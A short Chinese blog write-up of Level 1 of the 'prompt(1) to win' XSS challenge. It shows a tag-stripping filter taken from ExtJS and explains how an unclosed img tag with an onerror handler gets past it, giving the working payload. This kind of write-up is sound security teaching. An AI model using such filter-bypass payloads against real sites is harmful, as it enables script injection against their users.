【prompt(1) to win】 Level 1 - tags stripping



题目

function escape(input) {
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, '');

    return '<article>' + input + '</article>';
}

解题报告

注意观察正则表达式,它会把所有匹配 <tag></tag> 的标签全部剥离。

那么不构造完整的 tag 、仅通过属性注入就可以绕过了,如这样的 payload :

<img src=0 onerror=prompt(1) 注意末尾有一个空格


答案下载


文章作者: EXP
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !
  目录